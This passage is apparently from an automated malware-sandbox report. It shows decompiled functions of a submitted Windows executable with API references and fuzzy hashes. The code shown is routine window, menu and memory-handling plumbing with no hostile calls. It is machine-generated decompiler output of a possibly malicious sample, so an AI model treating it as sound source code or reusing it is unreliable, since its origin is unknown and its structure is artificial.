                  				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x110))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
                  				if(_t70 == 0x110) {
                  					E0040F5B7(_t56, 0, _t76, _t78 - 0x28,  *(_t78 + 8));
                  				}
                  				_t30 = _t56 + 0x58; // 0x58
                  				_t62 = 7;
                  				return E00431B73(memcpy(_t30, _t78 - 0x44, _t62 << 2));
                  			}

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040F634
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                  • String ID:
                  • API String ID: 24280941-0
                  • Opcode ID: a5e4790e460b5be2e02f3c679bf46ce18870f2b1a8203689afa57875004627af
                  • Instruction ID: 55c1a81f4b8db02ad9ddc7eda2fdd22912c5a9ef6f5b427848955299c37591cb
                  • Opcode Fuzzy Hash: a5e4790e460b5be2e02f3c679bf46ce18870f2b1a8203689afa57875004627af
                  • Instruction Fuzzy Hash: 6B217A72A00209DFCF15DFA4C4819DE3BA6FF58310F11843AF905AB691C738A985CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E004012B0(intOrPtr* __ecx, void* __edx) {
                  				void* __ebx;
                  				intOrPtr* _t14;
                  				void* _t16;
                  				signed int _t18;
                  				void* _t20;
                  				void* _t23;
                  				intOrPtr _t24;
                  				intOrPtr* _t26;
                  				intOrPtr* _t28;
                  				void* _t38;
                  				void* _t39;
                  				void* _t41;
                  				intOrPtr _t42;
                  				intOrPtr* _t43;
                  				void* _t45;
                  				intOrPtr _t46;
                  				intOrPtr _t47;
                  				void* _t49;
                  				void* _t50;
                  
                  				_t26 = __ecx;
                  				E00401090(__ecx, __edx, 0x8007000e);
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				_t42 =  *_t26;
                  				_t24 =  *((intOrPtr*)(_t42 - 0xc));
                  				_t43 = _t42 - 0x10;
                  				 *((intOrPtr*)(_t49 + 0xc)) = _t26;
                  				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t43)) + 0x10))))(_t38, _t41, _t45, _t23, _t26);
                  				_t35 =  *_t14;
                  				_t46 =  *((intOrPtr*)(_t49 + 0x18));
                  				_t28 = _t14;
                  				_t16 =  *((intOrPtr*)( *((intOrPtr*)( *_t14))))(_t46, 1); // executed
                  				_t39 = _t16;
                  				if(_t39 == 0) {
                  					E004012B0(_t28, _t35);
                  				}
                  				if(_t24 < _t46) {
                  					_t46 = _t24;
                  				}
                  				_t5 = _t46 + 1; // 0x1
                  				_t7 = _t39 + 0x10; // 0x10
                  				_t47 = _t7;
                  				_t18 = E0043065F(_t24, _t43 + 0x10, _t47, _t5, _t43 + 0x10, _t5);
                  				_t50 = _t49 + 0x10;
                  				 *((intOrPtr*)(_t39 + 4)) = _t24;
                  				asm("lock xadd [edx], eax");
                  				_t20 = (_t18 | 0xffffffff) - 1;
                  				if(_t20 <= 0) {
                  					_t20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t43)) + 4))))(_t43);
                  				}
                  				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)))) = _t47;
                  				return _t20;
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memcpy_s
                  • String ID:
                  • API String ID: 2001391462-0
                  • Opcode ID: af4fe0bf2a3b28bfa50e0f5dc0aec7f342693b3242073af976542bc3b97a567a
                  • Instruction ID: cb3531059e7c9241c49a6eff8f265f17319ee8308a504db105d52463e5de0ade
                  • Opcode Fuzzy Hash: af4fe0bf2a3b28bfa50e0f5dc0aec7f342693b3242073af976542bc3b97a567a
                  • Instruction Fuzzy Hash: 701186722006059FD305EF68C880D67B3A9FF8D314B10866EE65597351EB75E901CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00405714(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t34;
                  				intOrPtr _t41;
                  				void* _t56;
                  				intOrPtr* _t60;
                  				void* _t61;
                  				void* _t62;
                  
                  				_t56 = __edx;
                  				_push(4);
                  				E00431A9B(E0044ABB9, __ebx, __edi, __esi);
                  				_t60 = __ecx;
                  				_t29 =  *((intOrPtr*)(_t62 + 0x14));
                  				_t44 =  *((intOrPtr*)(_t62 + 8));
                  				 *(_t62 + 0xc) =  *(_t62 + 0xc) | 0x40000000;
                  				 *((intOrPtr*)(__ecx + 0xa4)) =  *((intOrPtr*)(_t62 + 8));
                  				if(_t29 != 0) {
                  					_t41 =  *((intOrPtr*)(_t29 + 8));
                  					if(_t41 != 0) {
                  						 *((intOrPtr*)(__ecx + 0xe8)) =  *((intOrPtr*)(_t41 + 0x68));
                  						 *((intOrPtr*)(__ecx + 0x60)) =  *((intOrPtr*)(_t41 + 0x6c));
                  					}
                  				}
                  				E004014C0(_t62 - 0x10, _t56);
                  				 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
                  				E004014C0(_t62 + 8, _t56);
                  				 *(_t62 - 4) = 1;
                  				_t32 = E00402720(_t62 - 0x10, _t44);
                  				_t66 = _t32;
                  				if(_t32 != 0) {
                  					E0041B29E(_t62 + 8,  *((intOrPtr*)(_t62 - 0x10)), 0, 0xa);
                  				}
                  				_t34 =  *((intOrPtr*)( *_t60 + 0x194))(E00408C1D(_t44, _t60, _t66,  *(_t62 + 0xc), _t44),  *((intOrPtr*)(_t62 + 8)),  *(_t62 + 0xc), 0x46279c,  *((intOrPtr*)(_t62 + 0x10)),  *((intOrPtr*)(_t62 + 0x14)));
                  				_t61 = 0;
                  				if(_t34 != 0) {
                  					_t61 = 1;
                  				}
                  				E004010B0( *((intOrPtr*)(_t62 + 8)) + 0xfffffff0, _t56);
                  				E004010B0( *((intOrPtr*)(_t62 - 0x10)) + 0xfffffff0, _t56);
                  				return E00431B73(_t61);
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 8a7514d54733c72b31dc1cced96e390b49405d59f9705daac9a0debe1872ddba
                  • Instruction ID: 4482dd84e3e1f924aac8e1e3bd257dd37003dfc8241748aaaf4d51b636d97771
                  • Opcode Fuzzy Hash: 8a7514d54733c72b31dc1cced96e390b49405d59f9705daac9a0debe1872ddba
                  • Instruction Fuzzy Hash: 88219F34600609EBDF00EF61C891FAF77A1EF04354F10452AF91A6B3E1DB749940DBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E004247D7(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t21;
                  				intOrPtr _t23;
                  				intOrPtr* _t26;
                  				intOrPtr* _t29;
                  				intOrPtr _t32;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				void* _t43;
                  				void* _t44;
                  
                  				_push(8);
                  				E00431ACE(E0044C0BF, __ebx, __edi, __esi);
                  				_t43 = __ecx;
                  				_t41 =  *((intOrPtr*)(_t44 + 8));
                  				if(_t41 != 0) {
                  					_t21 = E00424500(__ecx + 0x1c, _t41, __ecx, _t41);
                  					__eflags = _t21;
                  					if(_t21 == 0) {
                  						_t21 = E00424500(__ecx + 0x38, _t41, __ecx, _t41);
                  						__eflags = _t21;
                  						if(_t21 == 0) {
                  							_t23 = E0040444A(E0041FD51);
                  							 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                  							_t36 = _t43 + 4;
                  							 *((intOrPtr*)(_t44 + 8)) = _t23;
                  							_t32 = E0042FBA4(_t43 + 4);
                  							__eflags = _t32;
                  							if(__eflags == 0) {
                  								E004063FE(_t32, _t36, _t41, _t43, __eflags);
                  							}
                  							 *((intOrPtr*)(_t43 + 0x14))(_t32);
                  							_t26 = E004246C7(_t32, _t43 + 0x38, _t41); // executed
                  							 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                  							 *_t26 = _t32;
                  							E0040444A( *((intOrPtr*)(_t44 + 8)));
                  							_t29 =  *((intOrPtr*)(_t43 + 0x58)) + _t32;
                  							 *_t29 = _t41;
                  							__eflags =  *((intOrPtr*)(_t43 + 0x5c)) - 2;
                  							if( *((intOrPtr*)(_t43 + 0x5c)) == 2) {
                  								 *((intOrPtr*)(_t29 + 4)) = _t41;
                  							}
                  							_t21 = _t32;
                  						} else {
                  							_t39 =  *((intOrPtr*)(__ecx + 0x58)) + _t21;
                  							 *_t39 = _t41;
                  							__eflags =  *((intOrPtr*)(__ecx + 0x5c)) - 2;
                  							if( *((intOrPtr*)(__ecx + 0x5c)) == 2) {
                  								 *((intOrPtr*)(_t39 + 4)) = _t41;
                  							}
                  						}
                  					}
                  				} else {
                  					_t21 = 0;
                  				}
                  				return E00431B73(_t21);
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3_catch
                  • String ID:
                  • API String ID: 3886170330-0
                  • Opcode ID: 3e64b9e58c0a1709a153fe20580ef6c84a7755400a5b5cf31e2b7dbd7f5a3b76
                  • Instruction ID: 9197f78ff889db5bb5e608a4bb7d9c8daaa65afafdfa0369e7aef5d3225350aa
                  • Opcode Fuzzy Hash: 3e64b9e58c0a1709a153fe20580ef6c84a7755400a5b5cf31e2b7dbd7f5a3b76
                  • Instruction Fuzzy Hash: 5111C1747007509BC720EF26E94166AB7E0EFD1318B90853EE942976A1EB38E905CB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E00412F2D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t19;
                  				intOrPtr _t24;
                  				intOrPtr* _t27;
                  				void* _t30;
                  				signed int* _t32;
                  				void* _t33;
                  
                  				_t20 = __ebx;
                  				_push(4);
                  				E00431A9B(E0044B3B5, __ebx, __edi, __esi);
                  				_t30 = __ecx;
                  				 *((intOrPtr*)(__ecx + 0xcc)) = 0x451568;
                  				_t32 = 0x451510;
                  				do {
                  					_t16 =  *(_t33 + 8) &  *_t32;
                  					if(( *(_t33 + 8) &  *_t32 & 0x0000f000) != 0) {
                  						_t5 = _t32 - 4; // 0xe81b
                  						_t16 = E00409833(_t30,  *_t5);
                  						_t36 = _t16;
                  						if(_t16 == 0) {
                  							_t24 = E00404461(_t36, 0xc4);
                  							 *((intOrPtr*)(_t33 - 0x10)) = _t24;
                  							 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
                  							_t37 = _t24;
                  							if(_t24 == 0) {
                  								_t19 = 0;
                  								__eflags = 0;
                  							} else {
                  								_t19 = E004133F9(_t20, _t24, _t30, _t32, _t37, 0);
                  							}
                  							_t9 = _t32 - 4; // 0xe81b
                  							_push( *_t9);
                  							 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                  							_push( *_t32 | 0x56000000);
                  							_push(_t30);
                  							_t27 = _t19; // executed
                  							if( *((intOrPtr*)( *_t19 + 0x17c))() == 0) {
                  								_t16 = E0042280E(_t27);
                  							}
                  						}
                  					}
                  					_t32 =  &(_t32[2]);
                  				} while (_t32 < "iDockFrameWnd");
                  				return E00431B73(_t16);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00412F34
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 004133F9: __EH_prolog3.LIBCMT ref: 00413400
                    • Part of subcall function 004133F9: SetRectEmpty.USER32(?), ref: 00413450
                  Similarity
                  • API ID: H_prolog3$EmptyRect_malloc
                  • String ID:
                  • API String ID: 1428422903-0
                  • Opcode ID: 560d92e6b4d70705552a0594c27aa58a280f84e0716ba0d81986ee05fcab5f08
                  • Instruction ID: 60c52bf7d0ee18840f249dcd26fc2cf3d101614bcbc1bdb70064cbc4ec598c8f
                  • Opcode Fuzzy Hash: 560d92e6b4d70705552a0594c27aa58a280f84e0716ba0d81986ee05fcab5f08
                  • Instruction Fuzzy Hash: 66014C31700205ABEB18EF21C9167AEB2B0AF40304F00462FE856D73D1EBBC8D51965D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 44%
                  			E004134C3(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                  				signed int _v8;
                  				struct tagRECT* _v12;
                  				char _v28;
                  				void* __ebx;
                  				void* __edi;
                  				struct tagRECT* _t17;
                  				void* _t19;
                  				void* _t20;
                  				intOrPtr* _t30;
                  
                  				_t20 = __ecx;
                  				_v8 =  *(__ecx + 0xb0);
                  				_t17 = __ecx + 0xb4;
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				_t30 = _a8;
                  				_v12 = _t17;
                  				 *(__ecx + 0xb0) = 0 |  *_t30 == 0x00000000;
                  				CopyRect(_t17, _t30 + 4);
                  				_t19 = E004217B7(_t20, _t20,  &_v28, _a4, _t30); // executed
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				 *(_t20 + 0xb0) = _v8;
                  				return _t19;
                  			}













                  APIs
                  • CopyRect.USER32 ref: 00413500
                    • Part of subcall function 004217B7: CopyRect.USER32 ref: 004217F2
                  Similarity
                  • API ID: CopyRect
                  • String ID:
                  • API String ID: 1989077687-0
                  • Opcode ID: c4ecb7844e15528e9adc428bcb3507418fde64d8842dc894b86e224a8e58c7ec
                  • Instruction ID: cc5e8473d09934e6d7ff24cff4c9ac1d1a160460a925aeff77e35e501553fd45
                  • Opcode Fuzzy Hash: c4ecb7844e15528e9adc428bcb3507418fde64d8842dc894b86e224a8e58c7ec
                  • Instruction Fuzzy Hash: CC018176900704ABCB05DF99D8819DBBBBAFF46320F04017EFD0AAB201D7716A04CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E00427502(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t16;
                  				void* _t18;
                  				void* _t21;
                  				void* _t29;
                  				intOrPtr* _t34;
                  				void* _t35;
                  
                  				_push(0x7c);
                  				E00431A9B(E0044C3A0, __ebx, __edi, __esi);
                  				_t16 =  *((intOrPtr*)(__ecx + 0x10));
                  				_t37 = _t16;
                  				if(_t16 != 0) {
                  					__eflags = _t16 - 1;
                  					_t31 =  *((intOrPtr*)(__ecx + 8));
                  					_t34 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 8));
                  					if(_t16 <= 1) {
                  						L5:
                  						_t18 =  *((intOrPtr*)( *_t34 + 0x80))(0, 1);
                  					} else {
                  						E00427285(_t35 - 0x88, __ecx + 4);
                  						 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
                  						_t21 = E00417C2D(__ebx, _t35 - 0x88, _t31, __edi, _t34, __eflags);
                  						 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
                  						 *((intOrPtr*)(_t35 - 0x88)) = 0x4540cc;
                  						_t29 = _t35 - 0x88;
                  						__eflags = _t21 - 1;
                  						if(__eflags != 0) {
                  							_t18 = E004174FB(_t29, __edi, _t34, __eflags);
                  						} else {
                  							_t34 =  *((intOrPtr*)(_t35 - 0x10));
                  							E004174FB(_t29, __edi, _t34, __eflags);
                  							goto L5;
                  						}
                  					}
                  				} else {
                  					_push(0xffffffff);
                  					_push(_t16);
                  					_push(0xf104);
                  					_t18 = E00417146(__ebx, __edx, __edi, __esi, _t37);
                  				}
                  				return E00431B73(_t18);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427509
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                    • Part of subcall function 004174FB: __EH_prolog3.LIBCMT ref: 00417502
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: a2ba922fec3a509855610a124be86bd10da9b05b45ef600987d0f7498414911b
                  • Instruction ID: ca7fd307f2be72a3752cab3f0bceb8ec595584913dc78adcf506fcae19c16127
                  • Opcode Fuzzy Hash: a2ba922fec3a509855610a124be86bd10da9b05b45ef600987d0f7498414911b
                  • Instruction Fuzzy Hash: 66018830604121D7DB10EB15C881BADB330BF00318FA085DAF5569B1D1CF7DAEC58B49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E0040492C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t25;
                  				struct HWND__* _t26;
                  				struct HWND__* _t28;
                  				void* _t35;
                  				void* _t36;
                  
                  				_t36 = __eflags;
                  				_push(0x14);
                  				_push(0x45b0a0);
                  				E00431818(__ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t35 - 0x20)) = 0;
                  				_t25 = E0041EAD7( *((intOrPtr*)(E0041F363(0, __edi, __esi, _t36) + 0x80)), _t35 - 0x20);
                  				 *((intOrPtr*)(_t35 - 0x24)) = _t25;
                  				 *(_t35 - 0x1c) = 0;
                  				if(_t25 != 0) {
                  					 *((intOrPtr*)(_t35 - 4)) = 0;
                  					_t26 = CreateWindowExA( *(_t35 + 8),  *(_t35 + 0xc),  *(_t35 + 0x10),  *(_t35 + 0x14),  *(_t35 + 0x18),  *(_t35 + 0x1c),  *(_t35 + 0x20),  *(_t35 + 0x24),  *(_t35 + 0x28),  *(_t35 + 0x2c),  *(_t35 + 0x30),  *(_t35 + 0x34)); // executed
                  					 *(_t35 - 0x1c) = _t26;
                  					 *((intOrPtr*)(_t35 - 4)) = 0xfffffffe;
                  					E004049A6(0);
                  					_t28 =  *(_t35 - 0x1c);
                  				} else {
                  					_t28 = 0;
                  				}
                  				return E0043185D(_t28);
                  			}









                  APIs
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  • Opcode ID: 87500ae70025976bd9bfe52f2e7f2fc3dad7a477c7413be53226d0db631e77ba
                  • Instruction ID: 904469578396c1f20cc798ad30f63f77ac122cb8e5fcb475f2898160d20664ef
                  • Opcode Fuzzy Hash: 87500ae70025976bd9bfe52f2e7f2fc3dad7a477c7413be53226d0db631e77ba
                  • Instruction Fuzzy Hash: 2E01A57280020DAFCF41AFE5CD419DE7B71FF0C318F50452AFA6461161D3398961AF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040F720(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				void* _t10;
                  				long _t11;
                  				void* _t15;
                  				void* _t16;
                  				struct HWND__* _t18;
                  
                  				if(_a8 != 0x360) {
                  					_t18 = _a4;
                  					_t10 = E0040EE68(_t15, _t16, _t18, __eflags, _t18);
                  					__eflags = _t10;
                  					if(_t10 == 0) {
                  						L5:
                  						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
                  						L6:
                  						return _t11;
                  					}
                  					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
                  					if(__eflags != 0) {
                  						goto L5;
                  					}
                  					_t11 = E0040F62D(__ebx, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
                  					goto L6;
                  				}
                  				return 1;
                  			}











                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d53a845ea2ef5ea88e74bd1e4636f6f16ed949d4002cb73aa3a6d923430378a0
                  • Instruction ID: 2fdbec0b4a9ad72505348fdeb0c78ac9bbf9b9846fb0107a17cd17812a59923d
                  • Opcode Fuzzy Hash: d53a845ea2ef5ea88e74bd1e4636f6f16ed949d4002cb73aa3a6d923430378a0
                  • Instruction Fuzzy Hash: 6BF08232000119FBCF226FA18D048DB3BA9FF08351F008436FA14A2450C379C525DBAB
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00408BCA(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                  				signed int _t6;
                  				intOrPtr* _t16;
                  
                  				_t16 = __ecx;
                  				_t6 = E0040ED96(__ecx, __eflags);
                  				if(_t6 != 0xffffffff) {
                  					_t6 =  *((intOrPtr*)( *_t16 + 0x174))(_a4, _a8);
                  					__eflags = _t6;
                  					if(_t6 == 0) {
                  						goto L1;
                  					}
                  					PostMessageA( *(_t16 + 0x20), 0x362, 0xe001, 0); // executed
                  					 *((intOrPtr*)( *_t16 + 0x150))(1);
                  					__eflags = 0;
                  					return 0;
                  				}
                  				L1:
                  				return _t6 | 0xffffffff;
                  			}






                  APIs
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 518b6bc56b42b1954addd32922aee5ef2c76ca411e4787bcdaa7cdbfe747cad4
                  • Instruction ID: 84aef6605057a435e7b508d2a4ac3e57ad12db9fb388b43368d2a12da25d0cd9
                  • Opcode Fuzzy Hash: 518b6bc56b42b1954addd32922aee5ef2c76ca411e4787bcdaa7cdbfe747cad4
                  • Instruction Fuzzy Hash: D1F0A030344600ABDB211B758C09F9A7BA5FF49731F110A3AF9A5AA2E1CAB6D8508A45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004074CB(void* __ecx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr _t12;
                  				signed char _t14;
                  				signed char* _t17;
                  
                  				_t17 = __ecx + 0x84;
                  				_t14 =  *_t17;
                  				 *_t17 = _t14 & 0xfffff0ff; // executed
                  				_t12 = E0042143D(__ecx, _a4); // executed
                  				 *_t17 = _t14;
                  				if((_t14 & 0x00000004) != 0) {
                  					_t12 = _a4;
                  					if(( *(_t12 + 0x18) & 0x00000001) == 0) {
                  						return InvalidateRect( *(__ecx + 0x20), 0, 1);
                  					}
                  				}
                  				return _t12;
                  			}







                  APIs
                    • Part of subcall function 0042143D: DefWindowProcA.USER32(?,00000046,00000000,?,?,?), ref: 00421454
                    • Part of subcall function 0042143D: GetWindowRect.USER32 ref: 0042146C
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 004214AC
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 004214BB
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 004214D2
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 004214E1
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 00421512
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 0042151D
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 00421534
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 0042153F
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00407505
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 9a21fad790aa2c19dd04905c127bbca1332fb62e91397c7549314257c2d1ffd5
                  • Instruction ID: a7cd9ca6abd962d82728a90d354626cd2234a4d826fdd58f6502a378ddc358a9
                  • Opcode Fuzzy Hash: 9a21fad790aa2c19dd04905c127bbca1332fb62e91397c7549314257c2d1ffd5
                  • Instruction Fuzzy Hash: BEF0A0B2204205BBC7215F19DC85FC2BFA4EF54360F24012AF694572A1C776A880C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404CB4(intOrPtr* __ecx, intOrPtr _a4) {
                  				void* _t6;
                  				intOrPtr* _t20;
                  
                  				_t20 = __ecx;
                  				_t6 = 0;
                  				if( *((intOrPtr*)(__ecx + 0x5c)) == 0) {
                  					_t6 = E004049DB(_t9, GetMenuItemCount( *( *((intOrPtr*)( *__ecx + 0x6c))() + 4)));
                  				}
                  				return  *((intOrPtr*)( *_t20 + 0x194))(_a4, _t6);
                  			}






                  APIs
                  • GetMenuItemCount.USER32 ref: 00404CCE
                    • Part of subcall function 004049DB: GetSubMenu.USER32 ref: 004049E6
                  Similarity
                  • API ID: Menu$CountItem
                  • String ID:
                  • API String ID: 3435231853-0
                  • Opcode ID: ecc52130dda57000e9a2f394a1279dd2f42cfe611a84272c04a69c5f37652895
                  • Instruction ID: 2bd0770f7da49b8842ae51bb064b07c5258a274e3421cbc5c2ea82824ae108bd
                  • Opcode Fuzzy Hash: ecc52130dda57000e9a2f394a1279dd2f42cfe611a84272c04a69c5f37652895
                  • Instruction Fuzzy Hash: 35E06D72200104AFD7106B25C808C7ABBAAEF94321301403BF949C3210CB349C529B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041481D(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                  				void* __edi;
                  				intOrPtr* _t11;
                  				void* _t13;
                  				void* _t16;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  
                  				_t18 = _a4;
                  				_t17 = __ecx;
                  				if(_t18 >= 0) {
                  					_t11 = E0043108C(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
                  					if(_t11 == 0) {
                  						goto L1;
                  					}
                  					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
                  					 *_t11 = _t17;
                  					 *((intOrPtr*)(_t11 + 0xc)) = 1;
                  					 *((intOrPtr*)(_t11 + 8)) = _t18;
                  					return _t11;
                  				}
                  				L1:
                  				return 0;
                  			}










                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _malloc
                  • String ID:
                  • API String ID: 1579825452-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040547D(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                  				void* _t5;
                  				void* _t13;
                  				intOrPtr _t14;
                  				intOrPtr* _t16;
                  
                  				_t16 = __ecx;
                  				_t5 = E0040ED96(__ecx, __eflags);
                  				if(_t5 != 0) {
                  					_t14 = _a4;
                  					 *((intOrPtr*)( *_t16 + 0x64))(_t14, _t13);
                  					SetWindowLongA( *(_t16 + 0x20), 0xffffffec,  *(_t14 + 0x2c)); // executed
                  					return 1;
                  				}
                  				return _t5;
                  			}








                  APIs
                  Similarity
                  • API ID: LongWindow
                  • String ID:
                  • API String ID: 1378638983-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040451B(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				void* _t7;
                  				void* _t11;
                  				void* _t13;
                  				void* _t14;
                  				void* _t15;
                  
                  				_t15 = __ecx;
                  				_t7 = E0040ACDF(_t11, __ecx, _t13, _t14, __ecx, __eflags, _a4, _a8, _a12, _a16); // executed
                  				if(_t7 != 0) {
